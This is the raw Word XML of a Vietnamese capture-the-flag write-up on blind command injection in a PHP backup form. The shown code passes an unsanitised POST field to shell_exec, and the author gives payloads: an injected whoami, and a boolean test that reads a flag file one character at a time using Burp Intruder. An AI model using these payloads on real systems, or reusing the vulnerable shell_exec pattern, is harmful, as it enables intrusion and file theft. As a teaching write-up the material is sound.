        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08528F8F" w14:textId="0072E367" w:rsidR="001F6071" w:rsidRDefault="00EC478D" w:rsidP="001F6071">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mình sẽ copy câu lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00EA183C">
        <w:t xml:space="preserve">đằng sau biến target trong source </w:t>
      </w:r>
      <w:r w:rsidR="00090F64">
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="00B60C5E">
        <w:t xml:space="preserve"> và đưa nó vào input sau đó thêm # để phần đằng sau thành comment </w:t>
      </w:r>
      <w:r w:rsidR="001F6071">
        <w:t xml:space="preserve">giúp cho câu lệnh thực thi đúng dù mình chèn thêm gì cũng đc. Payload mình sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="001F6071">
        <w:t xml:space="preserve">là: </w:t>
      </w:r>
      <w:r w:rsidR="001F6071" w:rsidRPr="004053C8">
        <w:t xml:space="preserve">test.zip -r /var/www/html/index.php 2&gt;&amp;1; </w:t>
      </w:r>
      <w:r w:rsidR="001F6071">
        <w:t xml:space="preserve">whoami </w:t>
      </w:r>
      <w:r w:rsidR="001F6071">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D682223" w14:textId="625A20DC" w:rsidR="00EC478D" w:rsidRDefault="00EC478D" w:rsidP="00EC478D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6763F14D" w14:textId="238E15C6" w:rsidR="004053C8" w:rsidRDefault="004053C8">
      <w:r w:rsidRPr="004053C8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CE6123E" wp14:editId="61F03729">
            <wp:extent cx="5731510" cy="1018540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1445567138" name="Picture 1" descr="A long thin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67138" name="Picture 1" descr="A long thin black line&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1018540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B30174" w14:textId="7E9C7504" w:rsidR="00741D5D" w:rsidRDefault="00741D5D">
      <w:r>
        <w:t>Câu lệnh đã thực thi thành công cùng với thông báo backup thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1CF728" w14:textId="6CE5103A" w:rsidR="00803CD7" w:rsidRDefault="00741D5D">
      <w:r>
        <w:t xml:space="preserve">Tiếp đó để </w:t>
      </w:r>
      <w:r w:rsidR="0091419B">
        <w:t xml:space="preserve">tạo thông báo backup không thành công, mình sẽ sử dụng payload: </w:t>
      </w:r>
      <w:r w:rsidR="004053C8" w:rsidRPr="004053C8">
        <w:t>test.zip -r /var/www/html/index.php 2&gt;&amp;1; echo "zip error"</w:t>
      </w:r>
      <w:r w:rsidR="00EA183C">
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364A1337" w14:textId="72B564E1" w:rsidR="0091419B" w:rsidRDefault="004053C8">
      <w:r w:rsidRPr="004053C8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72EF515C" wp14:editId="29FA92D1">
            <wp:extent cx="5731510" cy="1742440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1895191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1562" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1742440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DA7CD" w14:textId="4F89CDCA" w:rsidR="004212A3" w:rsidRDefault="0091419B" w:rsidP="004C1F2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả xảy ra đúng như mong </w:t>
      </w:r>
      <w:r w:rsidR="002B1622">
        <w:t>đợi. Điều này chứng minh rằng mình có thể kiểm soát kết quả trả về của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B385433" w14:textId="471CCE6A" w:rsidR="004C1F2B" w:rsidRDefault="004C1F2B" w:rsidP="004C1F2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004C1F2B">
        <w:t>Sau đó, để thực hiện kỹ thuật Boolean-based, tôi sử dụng lệnh if để kiểm tra điều kiện logic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bằng câu lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="004C1F2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test.zip; if [ "$(whoami)" = "www-data" ]; then echo "zip error"; fi</w:t>
      </w:r>
      <w:r w:rsidRPr="004C1F2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004C1F2B">
        <w:t xml:space="preserve">Dựa vào phản hồi của hệ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thống, </w:t>
      </w:r>
      <w:r w:rsidRPr="004C1F2B">
        <w:t>nếu xuất hiện chuỗi "zip error" thì điều kiện đúng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và ứng dụng sẽ hiển thị backup không thành công</w:t>
      </w:r>
      <w:r w:rsidRPr="004C1F2B">
        <w:t>, ngược lại là sai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rồi từ đó</w:t>
      </w:r>
      <w:r w:rsidRPr="004C1F2B">
        <w:t xml:space="preserve"> có thể suy luận giá trị của biểu thức một cách gián tiếp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580968BB" w14:textId="11774B8C" w:rsidR="004212A3" w:rsidRDefault="004212A3">
      <w:r w:rsidRPr="004212A3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="289A0145" wp14:editId="6CF19EAC">
            <wp:extent cx="5731510" cy="1301115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="68221475" name="Picture 1" descr="A black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1475" name="Picture 1" descr="A black and white sign&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1301115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556E44D" w14:textId="488D14E9" w:rsidR="004C1F2B" w:rsidRDefault="004C1F2B">
      <w:r>
        <w:t xml:space="preserve">Kết quả của a=a là backup ko thành </w:t>
      </w:r>
      <w:r w:rsidR="00981355">
        <w:t>công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061917D4" w14:textId="6D913789" w:rsidR="004212A3" w:rsidRDefault="004212A3">
      <w:r w:rsidRPr="004212A3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770C80DF" wp14:editId="46953883">
            <wp:extent cx="5731510" cy="1267460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1047603634" name="Picture 1" descr="A computer screen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03634" name="Picture 1" descr="A computer screen with a white background&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1267460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE887D5" w14:textId="5E224B81" w:rsidR="00981355" w:rsidRDefault="00981355">
      <w:r>
        <w:t>Kết quả của a=b là backup thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD2AEB9" w14:textId="0CD0054C" w:rsidR="00981355" w:rsidRDefault="00981355">
      <w:r>
        <w:t>Từ các dữ kiện trên, mình sẽ xây dựng 1 payload để thực hiện đọc từng ký tự của flag bằng cách đọc các ký tự từ kết quả câu lệnh cat /*.</w:t>
      </w:r>
      <w:r w:rsidR="00EF2721">
        <w:t xml:space="preserve">txt </w:t>
      </w:r>
      <w:r w:rsidR="00EF2721" w:rsidRPr="00597F8F">
        <w:t xml:space="preserve">| cut -c </w:t>
      </w:r>
      <w:r w:rsidR="00EF2721">
        <w:t>1( tại sao là /*.txt đã được giải thích bài trước) còn cut -c 1 là để đọc ký tự vị trí đầu tiên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA027A2" w14:textId="706E658E" w:rsidR="00597F8F" w:rsidRPr="00FC450C" w:rsidRDefault="00597F8F" w:rsidP="00597F8F">
      <w:r w:rsidRPr="00597F8F">
        <w:t>test.zip -r /var/www/</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC450C">
        <w:t>html/index.php 2&gt;&amp;1; if [ "$(cat /*</w:t>
      </w:r>
      <w:r w:rsidR="00981355" w:rsidRPr="00FC450C">
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC450C">
        <w:t xml:space="preserve"> | cut -c 1)" = "c" ]; then </w:t>
      </w:r>
      <w:r w:rsidR="00FC450C" w:rsidRPr="004C1F2B">
        <w:t xml:space="preserve">echo "zip error"; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC450C">
        <w:t xml:space="preserve"> fi #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB6EC3A" w14:textId="77777777" w:rsidR="00EF2721" w:rsidRPr="00FC450C" w:rsidRDefault="00EF2721">
      <w:r w:rsidRPr="00FC450C">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35418536" w14:textId="563AF44B" w:rsidR="00597F8F" w:rsidRDefault="00EF2721">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sau đó mình sẽ chạy intruder trên burp suite để thực hiện kĩ thuật này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B54F37" w14:textId="44A024D1" w:rsidR="008237C1" w:rsidRDefault="008237C1">
      <w:r w:rsidRPr="008237C1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EB13413" wp14:editId="326CBA7F">
            <wp:extent cx="5731510" cy="2417445"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1575525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25299" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2417445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="247AA272" w14:textId="77777777" w:rsidR="00EF2721" w:rsidRDefault="00EF2721">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13817515" w14:textId="6068029F" w:rsidR="003968C7" w:rsidRPr="00FF23DE" w:rsidRDefault="003968C7" w:rsidP="006C2EE6">
      <w:pPr>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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687573E1" w14:textId="77777777" w:rsidR="003968C7" w:rsidRPr="00FF23DE" w:rsidRDefault="003968C7" w:rsidP="003968C7">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566"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D6589E" w:rsidRPr="00D6589E" w14:paraId="0C42FDBB" w14:textId="77777777" w:rsidTr="00D6589E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62A90243" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6589E">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08C8BDA7" w14:textId="16D904C6" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6589E">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18206612" w14:textId="1E98EC82" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6589E">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DF86F12" w14:textId="6BB60320" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6589E">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC9D7A9" w14:textId="40A2E2E7" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6589E">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10634B3C" w14:textId="43E7908F" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6589E">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C49F24C" w14:textId="25A19338" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6589E">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D606A41" w14:textId="429999F2" w:rsidR="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BE11B9C" w14:textId="38728B8D" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6589E">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15ED0CE3" w14:textId="19B3A126" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6589E">
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42141271" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6589E">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="171458D0" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="029FDC4A" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49D2A340" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30CDBA13" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F6843FE" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E053FFD" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A74A925" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1889E149" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C94761F" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="668483D6" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04C29D42" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3917B1C3" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D0B55F0" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16ECB8B3" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12765CB5" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61CF4FA3" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t>(isset($_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t>],$_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t>])){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="692F0FC8" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t xml:space="preserve">        $command = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D7D5741" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t xml:space="preserve">        $target = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C892C28" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>switch</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t>($command) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156FE8AE" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"backup"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="013E0F24" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"># Backup to /tmp/ folder and prevent writable to document root </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CFD31F7" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"timeout 3 zip /tmp/</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> -r </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D786D5" w14:textId="463FE9E8" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/var/www/html/index.php 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B5C8069" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Đã chạy câu lệnh backup"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46B6F1B8" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7363F4CF" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// CHANGELOG: Bảo trì</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CB3A8A7" w14:textId="77777777" w:rsidR="00D6589E" w:rsidRPr="00D6589E" w:rsidRDefault="00D6589E" w:rsidP="00D6589E">
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D6589E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
